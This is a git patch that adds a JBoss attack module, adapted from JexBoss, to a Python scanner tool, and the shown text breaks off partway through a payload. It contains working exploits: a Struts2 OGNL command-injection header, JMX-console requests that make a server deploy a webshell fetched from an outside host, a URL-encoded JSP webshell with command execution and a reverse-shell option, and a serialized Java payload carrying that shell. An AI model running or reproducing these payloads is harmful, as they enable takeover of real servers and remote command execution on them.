From 7be0abfcea75b7a2800ddcbaed02788727b9bf1c Mon Sep 17 00:00:00 2001 From: rpkr <13591644403@139.com> Date: Sun, 27 Jan 2019 16:28:37 +0800 Subject: [PATCH] add jboss check --- README.md | 15 +- jboss/Main_jboss.py | 14 + jboss/__init__.py | 1 + jboss/_exploits.py | 1899 +++++++++++++++++++++++++++++++++++++++++++ jboss/_updates.py | 144 ++++ jboss/jexboss.py | 1166 ++++++++++++++++++++++++++ moon.py | 4 + 7 files changed, 3242 insertions(+), 1 deletion(-) create mode 100644 jboss/Main_jboss.py create mode 100644 jboss/__init__.py create mode 100644 jboss/_exploits.py create mode 100644 jboss/_updates.py create mode 100644 jboss/jexboss.py diff --git a/README.md b/README.md index aa3942f..692c689 100644 --- a/README.md +++ b/README.md @@ -56,4 +56,17 @@ ## Gatepass - Gate Pass Management System 2.1 - 'login' SQL Injection #参考 https://www.exploit-db.com/exploits/45766/ -> moon.py -u gatepass http://xx.xx.xx.xx:xxxx \ No newline at end of file +> moon.py -u gatepass http://xx.xx.xx.xx:xxxx + +## Jboss + +- admin-console +- Checking Struts2 +- Checking Servlet Deserialization +- Checking Application Deserialization +- Checking Jenkins +- Checking web-console +- Checking jmx-console +- JMXInvokerServlet +- 此模块调用的是 #jexboss github可查 +> moon.py -u jboss http://xx.xx.xx.xx:xxxx \ No newline at end of file diff --git a/jboss/Main_jboss.py b/jboss/Main_jboss.py new file mode 100644 index 0000000..a103a47 --- /dev/null +++ b/jboss/Main_jboss.py @@ -0,0 +1,14 @@ +# -*- coding: utf-8 -*- +import os +import jboss + +def exec(URL): + print('[+]开始检测-jboss。[+]') + #切换工作路径 + os.chdir(os.path.realpath(__file__)[:35]) + os.system("py -2 jexboss.py -host "+URL) + print('[+]检测结束-jboss。[+]') + + +if __name__ == "__main__": + exec() diff --git a/jboss/__init__.py b/jboss/__init__.py new file mode 100644 index 0000000..7c68785 --- /dev/null +++ b/jboss/__init__.py @@ -0,0 +1 @@ +# -*- coding: utf-8 -*- \ No newline at end of file diff --git a/jboss/_exploits.py b/jboss/_exploits.py new file mode 100644 index 0000000..5533173 --- /dev/null +++ b/jboss/_exploits.py @@ -0,0 +1,1899 @@ +# -*- coding: utf-8 -*- +""" +Module to group exploits of the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +import jexboss +from time import sleep +from random import randint +import urllib +import base64, gzip, zlib +from sys import version_info +from io import BytesIO +if version_info[0] >= 3: + from urllib.parse import quote +import socket + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + + +global gl_http_pool + + +def set_http_pool(pool): + """ + Configure pool http + :param pool: http pool + """ + global gl_http_pool + gl_http_pool = pool + + +def get_successfully(url, path): + """ + Test if a GET to a URL is successful + :param url: The base URL + :param path: The URL path + :return: The HTTP status code + """ + sleep(5) + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + if result == 404: + sleep(7) + r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) + result = r.status + return result + + +def exploit_struts2_jakarta_multipart(url,cmd, cookies): + """ + Exploit Jakarta Multipart parser in Apache Struts (CVE-2017-5638) + Exploit improved from available in metasploit. This version works against Windows with Eastern language. + :param url: The url to exploi + :param cmd: Command to execute + :return: output of executed command + """ + cmd = cmd.replace(' ', ' ') + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "close", + "User-Agent": jexboss.get_random_user_agent()} + + content_type = ("%%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + "(#_memberAccess?(#_memberAccess=#dm):" + "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())." + "(#context.setMemberAccess(#dm))))." + "(#gift='%s')." + "(#isnix=(@java.lang.System@getProperty('file.separator').equals(\"/\")))." + "(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))." + "(#p=new java.lang.ProcessBuilder(#giftarray))." + "(#p.redirectErrorStream(true)).(#process=#p.start())." + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + "(#ros.flush())}" %cmd) + + headers['Content-Type'] = content_type + if cookies is not None: headers['Cookie'] = cookies + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + + if r.status == 404: + headers['Content-Type'] = 'text/html' + r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + if r.status == 200: + return " Could not get command output. You need to set up an Authoritative DNS and try to get the\n" \ + " output of the commands via DNS covert channel.\n" + return str(r.data) + + +def exploit_struts2_jakarta_multipart_v2(url,cmd, cookies): + """ + # FIX: this is not ready yet... + Exploit Jakarta Multipart parser in Apache Struts (CVE-2017-5638) + Exploit improved from @frohoff version (https://gist.github.com/frohoff/a3e24764561c0c18b6270805140e7600#file-reqnull-txt) + :param url: The url to exploi + :param cmd: Command to execute + :return: output of executed command + """ + cmd = cmd.replace(' ', ' ') + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "close", + "User-Agent": jexboss.get_random_user_agent(), + "Content-Type": "multipart/form-data; boundary=e85e9b09934f4b9daaa7ff6352cdf2df"} +''' + payload = (b"%%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + "(#_memberAccess?(#_memberAccess=#dm):" + "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())." + "(#context.setMemberAccess(#dm))))." + "(#gift='%s')." + "(#isnix=(@java.lang.System@getProperty('file.separator').equals(\"/\")))." + "(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))." + "(#p=new java.lang.ProcessBuilder(#giftarray))." + "(#p.redirectErrorStream(true)).(#process=#p.start())." + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + "(#ros.flush())}" %cmd) + + body = "--e85e9b09934f4b9daaa7ff6352cdf2df\n" + body+="Content-Disposition: form-data; name=\"form\"; filename=\"%s\"\n"%payload + body+="Content-Type: application/octet-stream\n\n" + body+="jexboss\n" + body+="--e85e9b09934f4b9daaa7ff6352cdf2df--\n" + + if cookies is not None: headers['Cookie'] = cookies + + r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body) + + return str(r.data) +''' + +def exploit_jmx_console_main_deploy(url): + """ + Exploit MainDeployer to deploy a JSP shell. + Tested and working in JBoss 4, 6. (bug in JBoss 5). + /jmx-console/HtmlAdaptor + :param url: The url to exploit + :return: The HTTP status code + """ + if not 'http' in url[:4]: + url = "http://"+url + + jsp = "http://www.joaomatosf.com/rnp/jexws4.war" + payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=" + "MainDeployer&methodIndex=19&arg0="+jsp) + jexboss.print_and_flush(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " + + "\n available at: " + jsp + ENDC) + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws4/jexws4.jsp") + + +def exploit_jmx_console_file_repository(url): + """ + Exploit DeploymentFileRepository to deploy a JSP shell + Tested and working in JBoss 4, 5 and 6. + /jmx-console/HtmlAdaptor + :param url: The URL to exploit + :return: The HTTP status code + """ + jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61" + "%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20" + "%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20" + "%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72" + "%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53" + "%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69" + "%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E" + "%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72" + "%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66" + "%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65" + "%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74" + "%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F" + "%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20" + "%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29" + "%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28" + "%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67" + "%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72" + "%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72" + "%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67" + "%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71" + "%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21" + "%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28" + "%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E" + "%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72" + "%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70" + "%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E" + "%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E" + "%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52" + "%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73" + "%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74" + "%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74" + "%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65" + "%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74" + "%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63" + "%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77" + "%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77" + "%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E" + "%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53" + "%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28" + "%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34" + "%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61" + "%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F" + "%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69" + "%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63" + "%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46" + "%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72" + "%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28" + "%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61" + "%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66" + "%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53" + "%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22" + "%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65" + "%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73" + "%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22" + "%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68" + "%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E" + "%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77" + "%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74" + "%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E" + "%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28" + "%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68" + "%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E" + "%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42" + "%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61" + "%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20" + "%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29" + "%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B" + "%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C" + "%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E") + + payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" + "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + "jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.St" + "ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True") + + headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": jexboss.get_random_user_agent()} + gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) + return get_successfully(url, "/jexws4/jexws4.jsp") + + +def exploit_jmx_invoker_file_repository(url, version): + """ + Exploits the JMX invoker + tested and works in JBoss 4, 5 + MainDeploy, shell in data + # /invoker/JMXInvokerServlet + :param url: The URL to exploit + :return: + """ + payload = ("\xAC\xED\x00\x05\x73\x72\x00\x29\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63" + "\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x49\x6E\x76\x6F\x63\x61\x74\x69" + "\x6F\x6E\xF6\x06\x95\x27\x41\x3E\xA4\xBE\x0C\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xC1\xD0" + "\x53\x87\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12" + "\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\x61" + "\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00" + "\x00\x78\x70") + payload += ("\xE3\x2C\x60\xE6") if version == 0 else ("\x26\x95\xBE\x0A") + payload += ( + "\x73\x72\x00\x24\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76" + "\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x56\x61\x6C\x75\x65\xEA" + "\xCC\xE0\xD1\xF4\x4A\xD0\x99\x0C\x00\x00\x78\x70\x7A\x00\x00\x04\x00\x00\x00\x09\xD3\xAC\xED\x00" + "\x05\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B" + "\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1B\x6A\x61\x76" + "\x61\x78\x2E\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65" + "\x0F\x03\xA7\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x2C\x6A\x62\x6F\x73\x73\x2E\x61\x64" + "\x6D\x69\x6E\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x44\x65\x70\x6C\x6F\x79\x6D\x65\x6E\x74\x46\x69" + "\x6C\x65\x52\x65\x70\x6F\x73\x69\x74\x6F\x72\x79\x78\x74\x00\x05\x73\x74\x6F\x72\x65\x75\x71\x00" + "\x7E\x00\x00\x00\x00\x00\x05\x74\x00\x0B\x6A\x65\x78\x69\x6E\x76\x34\x2E\x77\x61\x72\x74\x00\x07" + "\x6A\x65\x78\x69\x6E\x76\x34\x74\x00\x04\x2E\x6A\x73\x70\x74\x08\x98\x3C\x25\x40\x20\x70\x61\x67" + "\x65\x20\x69\x6D\x70\x6F\x72\x74\x3D\x22\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x2A\x2C\x6A\x61" + "\x76\x61\x2E\x75\x74\x69\x6C\x2E\x2A\x2C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x2A\x2C\x6A\x61\x76\x61" + "\x2E\x6E\x65\x74\x2E\x2A\x22\x20\x70\x61\x67\x65\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54" + "\x46\x2D\x38\x22\x25\x3E\x20\x3C\x70\x72\x65\x3E\x20\x3C\x25\x20\x63\x6C\x61\x73\x73\x20\x72\x76" + "\x20\x65\x78\x74\x65\x6E\x64\x73\x20\x54\x68\x72\x65\x61\x64\x7B\x49\x6E\x70\x75\x74\x53\x74\x72" + "\x65\x61\x6D\x20\x69\x73\x3B\x4F\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x6F\x73\x3B\x72" + "\x76\x28\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x69\x73\x2C\x4F\x75\x74\x70\x75\x74\x53" + "\x74\x72\x65\x61\x6D\x20\x6F\x73\x29\x7B\x74\x68\x69\x73\x2E\x69\x73\x3D\x69\x73\x3B\x74\x68\x69" + "\x73\x2E\x6F\x73\x3D\x6F\x73\x3B\x7D\x70\x75\x62\x6C\x69\x63\x20\x76\x6F\x69\x64\x20\x72\x75\x6E" + "\x28\x29\x7B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x69\x6E\x3D\x6E\x75\x6C" + "\x6C\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x20\x6F\x75\x74\x3D\x6E\x75\x6C" + "\x6C\x3B\x74\x72\x79\x7B\x69\x6E\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" + "\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65" + "\x72\x28\x74\x68\x69\x73\x2E\x69\x73\x29\x29\x3B\x6F\x75\x74\x3D\x6E\x65\x77\x20\x42\x75\x66\x66" + "\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x28\x6E\x65\x77\x20\x4F\x75\x74\x70\x75\x74\x53\x74\x72" + "\x65\x61\x6D\x57\x72\x69\x74\x65\x72\x28\x74\x68\x69\x73\x2E\x6F\x73\x29\x29\x3B\x63\x68\x61\x72" + "\x20\x62\x5B\x5D\x3D\x6E\x65\x77\x20\x63\x68\x61\x72\x5B\x38\x31\x39\x32\x5D\x3B\x69\x6E\x74\x20" + "\x6C\x3B\x77\x68\x69\x6C\x65\x28\x28\x6C\x3D\x69\x6E\x2E\x72\x65\x61\x64\x28\x62\x2C\x30\x2C\x62" + "\x2E\x6C\x65\x6E\x67\x74\x68\x29\x29\x3E\x30\x29\x7B\x6F\x75\x74\x2E\x77\x72\x69\x74\x65\x28\x62" + "\x2C\x30\x2C\x6C\x29\x3B\x6F\x75\x74\x2E\x66\x6C\x75\x73\x68\x28\x29\x3B\x7D\x7D\x63\x61\x74\x63" + "\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x65\x29\x7B\x7D\x7D\x7D\x53\x74\x72\x69\x6E\x67" + "\x20\x73\x68\x3D\x6E\x75\x6C\x6C\x3B\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50" + "\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x21\x3D\x6E\x75\x6C\x6C\x29\x7B\x73" + "\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22" + "\x70\x70\x70\x22\x29\x3B\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67" + "\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x58\x2D\x4A\x45\x58\x22\x29\x21\x3D\x20\x6E\x75\x6C\x6C" + "\x29\x7B\x73\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22" + "\x58\x2D\x4A\x45\x58\x22\x29\x3B\x7D\x69\x66\x28\x73\x68\x20\x21\x3D\x20\x6E\x75\x6C\x6C\x29\x7B" + "\x72\x65\x73\x70\x6F\x6E\x73\x65\x2E\x73\x65\x74\x43\x6F\x6E\x74\x65\x6E\x74\x54\x79\x70\x65\x28" + "\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x29\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" + "\x64\x65\x72\x20\x62\x72\x3D\x6E\x75\x6C\x6C\x3B\x53\x74\x72\x69\x6E\x67\x20\x6C\x68\x63\x3D\x28" + "\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x2E\x73\x70" + "\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2B\x22\x68\x2E\x6C\x6F\x67\x22\x29\x2E\x72\x65\x70" + "\x6C\x61\x63\x65\x41\x6C\x6C\x28\x22\x20\x22\x2C\x22\x2D\x22\x29\x3B\x74\x72\x79\x7B\x69\x66\x28" + "\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x7A\x00\x00\x04\x00\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22" + "\x6E\x6F\x2D\x63\x68\x65\x63\x6B\x2D\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3D\x3D\x6E\x75\x6C\x6C" + "\x29\x7B\x48\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x20\x63\x3D\x28\x48" + "\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x29\x6E\x65\x77\x20\x55\x52\x4C" + "\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x62\x73\x68\x65\x6C\x6C\x2E\x6A\x65\x78\x62\x6F\x73" + "\x73\x2E\x6E\x65\x74\x2F\x6A\x73\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x2E\x74\x78\x74\x22\x29\x2E" + "\x6F\x70\x65\x6E\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x28\x29\x3B\x63\x2E\x73\x65\x74\x52\x65" + "\x71\x75\x65\x73\x74\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E" + "\x74\x22\x2C\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6F" + "\x73\x74\x22\x29\x2B\x22\x3C\x2D\x22\x2B\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x52\x65\x6D" + 